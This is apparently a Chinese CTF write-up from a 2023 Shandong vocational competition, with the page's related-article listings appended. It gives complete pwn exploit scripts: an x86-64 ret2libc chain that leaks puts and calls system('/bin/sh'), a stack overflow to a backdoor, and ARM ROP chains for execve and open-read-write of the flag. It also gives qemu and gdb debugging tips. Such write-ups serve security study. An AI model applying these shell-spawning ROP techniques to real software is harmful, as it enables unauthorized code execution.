pwn2

return2libc,白给

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('libc.so.6')

rsetup('vt.jnxl2023.sierting.com',30454)

evgdb()

ret = 0x401230

rdi = 0x4011e3

puts = pltadd('puts')

got = gotadd('puts')

sl(b'9'0x18+p64(rdi)+p64(got)+p64(puts)+p64(0x4011e8))

addx = tet()

addx = getx64(0,-1)

libc = getbase(addx,'puts')

sys = symoff('system',libc)

binsh = libc + 0x00000000001d8698

sla(b'gift',b'1'0x18+p64(rdi)+p64(binsh)+p64(ret)+p64(sys))

pwn

c++题目,但是无所谓,没开canary肯定有栈溢出,直接开始尝试。除了输入int的不行,输入char字符串的应该可以溢出。有后门函数,直接狂溢出,注意栈对齐少一个push即可打通。

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

#libset('libc-2.31.so')

rsetup('vt.jnxl2023.sierting.com',31712)

evgdb()

sl(b'1')

sl(p64(0x4025db))

sl(b'1')

sl(p64(0x4025db))

sl(b'2')

sl(b'0')

sl(p64(0x4025db))

sl(p64(0x4025db)*999)

#没开canary,给了后门,直接栈溢出

ia()

pwn3

一道arm pwn,最有意思。这里记录一下调试方法,非常非常重要。

p = process(["qemu-arm", "-g", "1234", "./pwn"])首先写这个作为p。运行脚本之后,在另一个终端执行以下命令

即可调试。

arm架构中,调用号3是read,4是write,5是open,0xb是execve。

r7用来存储系统调用号。

r0,r1,r2分别为三个参数。其中r2的控制较为麻烦,不过问题不大。

知道上面这些之后就好打了,给出orw和execve的打法exp。

execve

from pwn import *

import sys

# 指定 qemu 命令和需要运行的二进制文件

#context(arch='arm',log_level='debug')#context(arch='arm',log_level='debug')

qemu_command = "qemu-arm"

binary_file = "./pwn"

context(os='linux', arch='arm', log_level='debug')

p = process(["qemu-arm", "-g", "1234", "./pwn"])

p = process(["qemu-arm", "./pwn"])

# 使用 process 函数启动 qemu 和二进制文件

n2b = lambda x    : str(x).encode()

rv  = lambda x    : p.recv(x)

rl  = lambda     :p.recvline()

ru  = lambda s    : p.recvuntil(s)

sd  = lambda s    : p.send(s)

sl  = lambda s    : p.sendline(s)

sn  = lambda s    : sl(n2b(n))

sa  = lambda t, s : p.sendafter(t, s)

sla = lambda t, s : p.sendlineafter(t, s)

sna = lambda t, n : sla(t, n2b(n))

ia  = lambda      : p.interactive()

rop = lambda r    : flat([p32(x) for x in r])

uu64=lambda data :u64(data.ljust(8,b'\x00'))

# Attach GDB to the running process with additional commands

#pause()

sh = 0x0005c58c #/sh

sla(b'message',b'admin:a:ctfer')

sla(b'message',b'ctfer\x00')

sh = 0x408001cc

sh = 0x0005c58c

r0r4pc = 0x000236f4

r1 = 0x00059e48 # pop {r1, pc}

r4 = 0x000104bc # pop {r4, pc}

r3 = 0x0001014c # pop {r3, pc}

svc = 0x0001d230 # svc #0 ; pop {r7, pc}

callr3 = 0x000108d8

flag = 0x86000

r7 = 0x0001d234 #r7

r2 = 0x0005a484 # mov r2, r1 ; mov r4, r0 ; mov r5, r1 ; mov r1, r0 ; mov r0, #2 ; blx r3

orw = p32(0) + p32(r7) + p32(3) + p32(r0r4pc) + p32(0)*2 + p32(r1) + p32(0x86000) + p32(svc)#read /bin/sh

orw += p32(0xb) + p32(r1) + p32(0) + p32(r3) + p32(r0r4pc) + p32(r2) + p32(0x86000)*2 + p32(r1) + p32(0)+p32(svc)

sla(b'say something',b'/bin/sh\x00caaadaaaeaaafaaagaaahaaaiaaa'+orw)

sl(b'/bin/sh\x00')

p.interactive()

orw

from pwn import *

import sys

# 指定 qemu 命令和需要运行的二进制文件

#context(arch='arm',log_level='debug')#context(arch='arm',log_level='debug')

qemu_command = "qemu-arm"

binary_file = "./pwn"

context(os='linux', arch='arm', log_level='debug')

#p = process(["qemu-arm", "-g", "1234", "./pwn"])

p = process(["qemu-arm", "./pwn"])

# 使用 process 函数启动 qemu 和二进制文件

n2b = lambda x    : str(x).encode()

rv  = lambda x    : p.recv(x)

rl  = lambda     :p.recvline()

ru  = lambda s    : p.recvuntil(s)

sd  = lambda s    : p.send(s)

sl  = lambda s    : p.sendline(s)

sn  = lambda s    : sl(n2b(n))

sa  = lambda t, s : p.sendafter(t, s)

sla = lambda t, s : p.sendlineafter(t, s)

sna = lambda t, n : sla(t, n2b(n))

ia  = lambda      : p.interactive()

rop = lambda r    : flat([p32(x) for x in r])

uu64=lambda data :u64(data.ljust(8,b'\x00'))

# Attach GDB to the running process with additional commands

#pause()

sh = 0x0005c58c #/sh

sla(b'message',b'admin:a:ctfer')

sla(b'message',b'ctfer\x00')

sh = 0x408001cc

sh = 0x0005c58c

r0r4pc = 0x000236f4

r1 = 0x00059e48 # pop {r1, pc}

r4 = 0x000104bc # pop {r4, pc}

r3 = 0x0001014c # pop {r3, pc}

svc = 0x0001d230 # svc #0 ; pop {r7, pc}

callr3 = 0x000108d8

flag = 0x86000

r7 = 0x0001d234 #r7

orw = p32(0) + p32(r7) + p32(3) + p32(r0r4pc) + p32(0)*2 + p32(r1) + p32(0x86000) + p32(svc)#read

orw += p32(5) + p32(r0r4pc) + p32(flag)*2 +p32(r1) + p32(0) + p32(svc)#open

orw += p32(3) + p32(r0r4pc) + p32(3)*2 + p32(r1) + p32(0x87000) + p32(svc)#read,这里的r0可以是3或者7

orw += p32(4) + p32(r0r4pc) + p32(1)*2 + p32(r1) + p32(0x87000) + p32(svc)

#5是open

#4是write

#3是read

sla(b'say something',b'/bin/sh\x00caaadaaaeaaafaaagaaahaaaiaaa'+orw)

sl(b'/flag\x00')

p.interactive()

附上c-python调试方法

采用香山杯2023题目。

在开头加上代码

import sys

sys.path.append('./')

然后,确保python版本和库版本相同。

app.cpython-37m-x86_64-linux-gnu.so这里是37m也就是python3.7。

然后导入就可以运行了。调试的时候,使用代码如下。

p = process(["python", "./main.py"])

gdb.attach(p)

记得下断点到库里面的内容。

山东职业竞赛wp2023(arm、cpython)的更多相关文章

  1. 全国高校json数据包(复python解析代码)

    由于这段时间需要有关学校的三级联动插件,找了很久没有找到合适的,所以去教育部官网下载了一份全国普通高校名单(2019年), 这里附上解析该xls文件的代码 import xlrd import jso ...

  2. 应聘linux/ARM嵌入式开发岗位

    **************************************************************** 因为发在中华英才和智联招聘没有人采我所以我 在这里发布我的个人简历希望 ...

  3. Linux方向职业规划

    Linux方向职业分析 引言: 据了解,Linux普通网络管理人员的月薪大约5000元左右,负责编程的Linux软件工程师月薪大约在8000元到12000元之间,Linux嵌入式软件开发人员的月薪大约 ...

  4. STM32与LPC系列ARM资源之比较

    由于有周立公开发板的影响,LPC系列的开发板在工程师心目中一般是入门的最好型号之一.这次刚好有STM32的竞赛,正好将两者的资源进行比较一下(LPC系列以LPC213X为例). LPC213X包括LP ...

  5. 基于ARM的车牌识别技术研究与实现

    在云盘里包含了我本科毕业设计的全部资料和代码.主要涉及下面摘要中的几个部分.虽然系统无法实用,但是适合机器视觉和嵌入式方向的入门.希望能对有志从事相关方向的朋友有所帮助.本人现在在深圳从事机器视觉算法 ...

  6. 【转】Linux方向职业分析

    引言: 据了解,Linux普通网络管理人员的月薪大约5000元左右,负责编程的Linux软件工程师月薪大约在8000元到12000元之间,Linux嵌入式软件开发人员的月薪大约在12000元以上. 影 ...

  7. 安晓辉大神的感悟:如果你发现了自己的学习模式,愿意学并且能坚持,我觉得没什么能阻挡你征服软件世界的脚步(对于开发人员来讲,最大的风险是:在职业规划上没有延续性地乱跳槽。时刻要牢记在心的:培养自己的稀缺性) good

    从技术支持中途转战软件开发,如今从事编程工作已十多有余,2014年CSDN博文大赛编程语言组冠军.CSDN Qt论坛的版主安晓辉老师从今天开始,坐镇CSDN社区问答栏目的 第十四期,届时会接受广大网友 ...

  8. 解读ARM成功秘诀:薄利多销推广产品

    解读ARM成功秘诀:薄利多销推广产品 2013年07月04日 15:04   新浪科技 微博    我有话说(2人参与)   导语:美国电子杂志Slate周一发表署名 法哈德·曼约奥(Farhad M ...

  9. 安卓5.0宣告了ARM平台全面进入64位时代

    安卓5.0宣告了ARM平台全面进入64位时代 2014年10月份,安卓5.0正式版发布了,安卓5.0支持64位CPU,安卓5.0全面启用ART运行模式,在程序安装的时候,进行预编译,新的运行环境能够使 ...

  10. 山东理工oj--1912--IP地址(水题)

     IP地址 Time Limit: 1000ms   Memory limit: 65536K  有疑问?点这里^_^ 题目描述 2011年2月3日,国际互联网名称与数字地址分配机构(ICANN) ...

随机推荐

  1. python毕业设计选题15例,马上要毕业啦,大家做好准备了没

    Hi,大家好,大四的同学马上要开始毕业设计啦,大家做好准备了没! 学长给大家详细整理了最新的python计算机毕设相关选题,对选题有任何疑问,都可以问学长哦. 1. 网上商城系统 这是一个基于pyth ...

  2. TiKV 服务部署的注意事项

    TiKV 服务部署的注意事项 背景 最近发现tikv总是会掉线 不知道是哪里触发了啥样子的bug. 所以想着使用systemd 管理一下, 至少在tikv宕机的时候能够拉起来服务. 二进制文件 pd- ...

  3. [转帖]学会BeanShell,才敢说自己懂Jmeter

      https://baijiahao.baidu.com/s?id=1717349581352944280&wfr=spider&for=pc jmeter的BeanShell Sa ...

  4. [转帖]nginx性能和软中断

    https://plantegg.github.io/2022/11/04/nginx%E6%80%A7%E8%83%BD%E5%92%8C%E8%BD%AF%E4%B8%AD%E6%96%AD/ n ...

  5. [转帖]淫技巧 | 如何查看已连接的wifi密码

    https://blog.csdn.net/DynmicResource/article/details/120134984?spm=1001.2014.3001.5502 主题使用方法:https: ...

  6. Rsync的一个高级应用

    Rsync的一个高级应用 背景 2019年刚开始接触linux时. 有一个很恶心的场景. 很多人为了简单起见, 提交数据库的修改(数据结果和预制数据) 都不是增量处理, 都是全量提交过来. 所以会造成 ...

  7. Windows设置一键安装Mysql数据库的方法

    Windows设置一键安装Mysql数据库的方法 前言 因为MySQL数据库的8126 65536 以及3072最大索引长度等问题 研发这边提交的补丁总是出现稀奇古怪的问题. mysql数据库又因为D ...

  8. K8S 知识点

    1. K8S集群大小 在 v1.7 版本中,Kubernetes 支持集群节点(node)数可达1000个.更具体地说,我们配置能够支持所有如下条件: 不超过2000个节点 不超过总共6000个 po ...

  9. 自动部署(apb docker cicd gitlab)

    1.安装gitlab-runner docker pull gitlab/gitlab-runner:latest 2.运行镜像 docker run -d --name gitlab-runner ...

  10. 6张图表 + 1个案例 带你入门tcpdump的使用和原理

    一.tcpdump简介 tcpdump是什么? 来看看 tcpdump官网怎么说:This is the home web site of tcpdump, a powerful command-li ...